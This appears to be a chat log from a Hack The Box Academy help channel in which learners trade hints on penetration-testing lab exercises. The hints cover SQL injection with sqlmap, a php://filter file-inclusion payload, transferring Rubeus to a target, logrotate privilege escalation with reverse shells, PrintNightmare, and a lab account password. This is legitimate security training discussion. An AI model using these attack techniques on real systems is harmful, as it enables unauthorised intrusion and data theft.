Damn
I don't have notes on these but I am sure it was something very simple. Are you at initial foothold stage or do you already have access to the machine?
it's very simple
Did you resolve it?
If no, share your errors and I might be able to figure it out.
Passed my CCNA today... Now I'm ready to knock out these modules (after a week's rest) 😄
Congrats 🎉
Hello guys! I need help with one question for the "Filter Contents" exercise in the Linux Fundamentals module, the last question with host "https://www.inlanefreight.com" doesn't work.
What exactly is not working? What have you tried?
The curl command on this URL is not working
I have tried curl in ssh connection and in my machine
It's a com address, you can access it from anywhere.
no, I use the ssh connection to connect my machine in vpn
and inside the htbstudent user I tried to use curl on this url
The question is ""
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."
The PwnBox does not have access to the Internet, right?
Sorry to interrupt dudes...but is there no begginer discussion section?
Then it can not work
why not?
I have just tried it and it works fine
lol i will try again
Hello..can anyone see me typing?
Hi
Welcome
Wait a moment, I am about to find the link
Ahh ok 👍 I was worried I had to do more verification lol
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Check this out ^
Thank you 😊
No worries, if you have more questions, you may ask them on #general
My command: curl https://www.inlanefreight.com
Response: curl: (6) Could not resolve host: www.inlanefreight.com
This seems to be a DNS problem.
hmmm how can I solve this?
What happens when you enter dig www.inlanefreight.com?
;; ANSWER SECTION:
www.inlanefreight.com. 60 IN A 134.209.24.248
not have this line
and with
dig www.inlanefreight.com @1.1.1.1
Yes, your DNS resolver does not seem to resolve inlanefreight.com.
Authority? You mean Answer?
I got the answer line
maybe the DNS does not resolve the host
i will change
this is it, the DNS is not resolving the host, thx for the help!
Probably your DNS resolver requires DNSSEC.
Hi guys, im not able to proxy ffuf request, on ffuf itself with -proxy-reply nor with proxychains (i wanted to proxying the tool to view some requests through Burp). Does anybody have the same problem?
I tried with dirb and it worked, but when I try ffuf it doesn't (via proxychains as taught on the module "Using Web Proxies")
Which section is that, can you send its link?
module/110/section/1053 is the guide i followed
Are you trying to solve the exercise or is it something else?
I'm trying to solve an exercise on the FFuf module, and i encountered this problem
I can work around on this, but i just wanted to know why i'm having problems proxying ffuf
The section you have linked does not mention ffuf anywhere.
Nevertheless, proxychains has a config file, it's going to use a proxy for making connections. Make sure it was setup properly
Maybe wrong sections to ask help, i do apologize, thank you anyway
No it's okay, you are working with ATTACKING WEB APPLICATIONS WITH FFUF and you are trying to reuse what you learned in using web proxies on an exercise but this time with ffuf, is that correct?
Yes, correct
i got it by changing the dns settings, thx for help
I can understand a little but don't give up. Try to explain your issue with a little more details and see if someone else has a clue.
Thanks once again, i will
Stuck on pivoting assessment. I am currently RDP'd into ||.25|| as ||vfrank|| and can see that the next hop is to the DC. However, I have no idea how to get access to the DC. I ran an nmap scan and didn't find any open ports, and I can't seem to connect to the DC at all.
Check for ||shares||
No problem lol
can someone give me a hint at the WINDOWS ATTACKS & DEFENSE , "After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?"
The event ID is communicated in the module.
please.. anyone avaliable to offer little help on LINUX PRIVILEGE ESCALATION ==>> Logrotate
Hi
I know that one is very difficult
I can help you out, dm me
I would like to start a study group for the people just starting out on HTB. DM me to discuss.
I am mounting another vm with windows 10 to run dnspy, visual studio and that things. Do u think it is worth it having both?
Check out Commando VM
https://github.com/mandiant/commando-vm
ty
that is installed with pentesting tools already?
This script installs hacking tools on your Windows VM
oh nice ty
But it is already a bit older
I can install when I need the tool manually
I used https://gchq.github.io/CyberChef/ It has a much easier interface than Burp or ZAP.
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Heyyy - Just completed the XSS module and I'm also working on the port swigg site and the stuff over at swigg has quite a few extra layers of complexity - is there a more advanced XSS module that anyone knows of? the academy platform is leagues ahead so if possible Id prefer to use it 😄
that's the classic ctf experience
There are so many ways that things can happen that I don't think it's necessarily wrong to use something that isn't explicitly stated in the module, and many times (as you noted), it'll stick with you as an option going forward.
That being said, started doing the password attacks module to see if it is as bad as people make it out to be, and whoever made the password mutations challenge just really wants you to waste your time huh
Is anyone available to assist with a question in the Attacking Enterprise Networks module? I'm having an issue with the Web Enumeration & Exploitation section. I've tried different payloads using sqlmap to get access to the database and nothing seems to be working.
Do you still need help? I might be able to
Yes, I could use some help. Thank you!
I'm on the fourth question and I'm trying to use sqlmap to get into the database and so far nothing is working.
Did you review this module? https://academy.hackthebox.com/module/33/section/217 it should help, looking at my notes that was what I started with
I did not use sqlmap, I did it manually. Oh wait scratch that I did it both ways..
No, this is the module. https://academy.hackthebox.com/module/163/section/1544
Yeah I understand that. The module I referenced is worth reviewing for the part you are on. What have you been trying? Maybe showing some of what you tried will give me a better idea of how to help.
Ah, gotcha. I misunderstood.
I've been just trying different variations of sqlmap with different level and risk switches. So far, it looks like sqlmap just doesn't work here.
it does work, are you trying on a GET or POST request?
ok good, I captured the request in Burp and saved it as a file, to make it easier to deal with.
So a POST is fine?
I have it saved to a file as well with the searchitem set as my injection point.
I get the same output in the lesson when I run this command $ sqlmap -r sqli.txt --dbms=mysql -D status --tables. However, when I try to modify it and add switches for level and risk, it just runs forever and appears to just continuously start over.
I don't think you need to mess with level and risk, you're pretty much there, you just need to pull the data...
I guess that's where I'm confused. I don't see how to pull any data if I can't get logged into the database.
use that same command you have shown me, you just need to tack one more thing onto it..
How would you dump data out of the table?
Yeah, it's a dump alright. I got it! Thank you!
No problem!
I just couldn't recall how to get the database to dump its contents. I was looking all over for it and I kept over looking it. Thank you so much!
For sure! happy to help, I know how that tunnel vision etc can go...
for this module: https://academy.hackthebox.com/module/147/section/1356, I found a file named Backup.vhd, I got this file through smb protocol from David's user. How do I decrypt this file?
If I remember correctly that is a Windows backup, you need to figure out how to mount it. I know there was some information on how to do this in Linux, I ended up booting into a windows machine and mounting it in there. I am going off memory so I might be off.
so can you help me
Is the initial bruteforce for Password Attacks - Hard skill assessment supposed to take this long?
Feel like I've been letting this run forever, and not sure if there's anything better I could be doing
Not really, the ssh doesn't seem to be working, even if I make a mistake on purpose still doesn't reject me
Were you able to get it?
There are some lists provided in the resources, it should only take a couple of minutes
using those lists with the mutations and have gotten nothing
Strange
@rustic sage It works when I ssh from my pc rather than from user2
hey what are you talking
no idea why but the brute forcing for the initial foothold could be buggy for me so i just give that a quick try and was able to get the password in about 1 min
you have RDP with that user so either use xfreerdp with a mounted share drive or just use updog
I am having a problem with unlocking modules
contact support via the chat bubble
Hi, I'm in 'AD Enumeration & Attacks - Skills Assessment Part I', does anyone have any idea about how to download the Rubeus tool to the target machine?
What access do you have already ?
if you are on the first machine just host a python server and wget the tool on the target machine, but if you are on ||MS01|| then there's an existing web site on the first machine, so just put the tool there and on the second machine wget the tool from the site running on the first machine
TAT
finally QAQ
just finished Password Attacks module... definitely need more than 8 hours -.-
Skills Assessment on progress
The important thing is that you have understood everything, not how long it took you to do it.
hydra toooooo slow (
better to suffer the 8 hours in training than in a real job
lol
Sweat in training so you don't have to bleed in battle
POWER
Yeap. It was tiring but satisfying at the end 😀
How can I find the mail of the administrator when I have a IMAP/POP3 server? I have tried to connect to these servers and list out the mails but I got nothing, then I tried to use NMap and got nothing, then I used curl and I got nothing. Is the answer a part of the banner?
Can someone help me on Attacking Common Application - thick client, where I already downloaded the fatty-server.jar but for some reason it's not opening. stuck in this machine for 4 days 😦
"[...] I have tried to connect to these servers and list out the mails but I got nothing [...]"
Try to give it another go and pay attention to the output it may be that you have overlooked something
There are 0 mails on both of the servers
keep enumerating
I'm encountering the same problem. anyone who could give me hints? thanks in advance.
Does this mean i cant select them but I can still list them?
WHA
It's case sensitive
Omah
:I
Lol
yes, i found it but aaaaa it would have saved so much headache knowing that
hello guys, I'm looking for a piece of advice if anyone got one, I have finished the AD enumeration module but I don't feel like I've digested all of its contents, and the assessment felt like 30% of what the contents rly were, is it normal and I just have to practice more or should I go back and redo the module until I've digested every concept there?
If you go back you'll learn it now, maybe to the same level, if you try to do a box or lab you'll learn it and get a deeper understanding
(My opinion, or you could do both)
go through it again, but i can suggest creating your own simple AD lab to play with things. or finding an AD lab online
You'll get some more when you get to the 'Attacking Enterprise Networks' module.
Can you ping the host from user2?
I can't seem to find the flag, I have found 1 mail and 2 emails but the flag was neither of those
@rustic sage no, but I can connect from my pc. It must be a bug or something like that
oke oke, ty all
Isn't this the one where you need to find a flag in inbox?
if user2 can't ping the host then it's a network related issue, but you got the flag right?
@rustic sage yep
the council has decided skill issue: I completed the AD Enumeration & Attacks - Skills Assessment Part I but I had no luck getting the second user's cleartext password. I tried what was suggested in the chat but no luck 😦
I can create new files or directories
ah nm lol
im in the users dir, had to go up a few levels!
Hi I am hard stuck in the footprinting module in the DNS Section
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
Try dig any inlanefreight.htb @10.X.X.X
Already did that
none of the results here count me as correct answer
ok thanks got it @plain coral
FML just because you cant psremote with it doesnt mean its not real
I'm stuck on attacking common services easy. I found the user and the user's password but can't figure out how to use these credentials to get the flag
any hint would be great help! I also attempted to use curl to upload a web shell but couldn't get it to work. Now I'm wondering if it was even intended to use curl
Section link would help here
dm me
why do I need " cn' " there?
you dont
it's just an example data
the first ' is the entrypoint of the injection
Oh I understand, thanks
hi guys, I'm new to cybersec/HTB Academy and am hoping for some feedback. for the Hacking Wordpress assessment, to find flag.txt in a directory I did wget to download all txt files from the two vulnerable plugin websites and then used tree to find the file. unfortunately no luck finding the file.
could anyone nudge me in the right direction without giving the answer? definitely stuck on this
I am having trouble ssh'ing into this particular address with the password "previous result" in the Skills assessment section of the "Introduction to the windows command line" module and I think it has something to do with the space between the two words for this password.
Nevermind, I fixed it . I was supposed to use the result of the previous flag from the previous question and so I misunderstood
https://academy.hackthebox.com/module/35/section/224
web server seems bugged, web server says "Received content contained invalid JSON!" even though it's working with postman, etc.
hi
So the flag is in the Inbox? But there are no mails there
what is uidnext?
finally figured this one out..... talk about a simple solution
Hello fellas, I'm stuck with a file inclusion lesson, to be more specific this one: Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer. I already tried with the ||php://filter/read=convert.base64-encode/resource=config|| payload, but the only thing I get is a blank zone in the website. Same thing with other php filters from PayloadsAllTheThings
anyone can help me out with verifying? i tried /verify in the bot-commands channel but it's been stuck verifying since
Hey need help with attacking common services the EASY lab
make sure you use the correct quotes
https://academy.hackthebox.com/module/23/section/1492 this is the lesson I'm stuck with
I can only find three emails and one mail, when I try to submit the emails it doesn't work
I try to input the emails and it doesn't work :I
Flag, not Mail Address 😉
i have
even used checke with the commands from the cheatsheet
No?
Hey!!!!
Can anybody help? Module: Attacking Common Services Section: Attacking Common Services Easy. I don't know what to do after I find the user:pass of the user. Things I've tried is doing the cURL command I found on the htb forum but I can't get it to work. Is what I have to do even covered in the module attacking common services?
Just the person i wanted to talk to
Hi
https://academy.hackthebox.com/module/51/section/1777
Linux Escalation.
What is the latest Python version that is installed on the target.
I found the answer and submitted it. Although I'm unsure how to get it. Python --version or -version or -v doesn't work.
|| Simply look in the installation directory ||
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.lis
This?
list all installed packages and grab python, easy
By the way, I'm still lost with the file include exercise 😆
There are several ways
Thanks
Your EZ
If anybody has a clue, it will be welcome ^^
Just a clue, not the answer please.
Ok I was going through that huge list and trying a few and i was like meh there must be a different way. But i see where i was blind.
You can dm me.
It still doesn't work
Noke1, that's not the flag... The flag should be something like HTB{W3ll_D0n3_Th1s_1s_4n_3x4mpl3_0f_4_Fl4g}
Why does it specify the format then?
Yes, that's the format... HTB{The_Flag}
Try to look something like that in the exercise.
I have several, but they are from past exercises
I cant get it to show
I searched for the email which contains "HTB{" then I try to fetch it and I dont get the flag
how
lol
Wanna do vc in private?
ok
Did you get it?
make sure you’re aware what you’re doing there
you’re fetching the subject only
Yes
I found out
I found the flag
I was stupid lmao
nice, gj
yeah, i was gonna suggest the rfc page
Anyone avail to chat about the linux privesc: logrotate? DONE. Thx c0nstant and scriptie
I can help you out with this. Dm me.
Idk if it was just me but, the position of the arguments used for the exploit mattered.
Ah, Thanks! xD
suggestion: you can use github's gists for smaller things, here is an example of one my rusty codes:
https://gist.github.com/0xkasra/bcc222d180a1cc00e819d97a4570928a
struggling on AD Enumeration & Attacks - Skill Assessment Part II, Q7 ("Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host")
I currently have a shell on SQL01, but failing to ||exploit PrintNightmare as the POC script errors with "Failed to enumerate remote pDriverPath" even though I validated that the SMB path to my DLL is valid.||
||I also tried JuicyPotato, but for some reason I am unable to write to any directory from the service account||
any suggestions appreciated, stuck on this for days
try another escalation technique. ||Print nightmare is close...||
There is a writeable location on that host, there are more places than C:\Windows\Temp 😉
-d is not necessary
In 'AD Enumeration & Attacks - Skills Assessment Part I' how to find 'Submit this user's cleartext password.' it is Q6
Yeah, it's going to be fun
Kindly, please do not post and upload any ZIP files, no matter what they have inside
Plus do not spoil with any commands any of the exercises that are not from tier 0 modules
Anyone able to give me a nudge on Linux Privilege Escalation - Logrotate?
Found the .log file and it seemed like the log did rotate and got some output that looked promising but still not able to catch a reverse shell
Deleted.
tried to re-create the example
[-] The following options failed to validate: Value 'PORT' is not valid for option 'RPORT'.
RPORT => 80
RHOSTS = Target
any suggestions for how to enumerate for it? been manually digging for it for some time due to no luck with tools
logrotten will print "Done!" if it actually worked. might have to run it multiple times from my experience
You could do some looping with icacls, or you could look for a particular "user". That said, I just knew about this place, didn't need to enumerate.
If you want to wrestle with that some more, be my guest, otherwise, click here: ||C:\Users\Public||
Can I dm you?
sure
ah, that was my first intuition on this box
looks like the shell is at fault then 😓
at least that narrows it down, thank you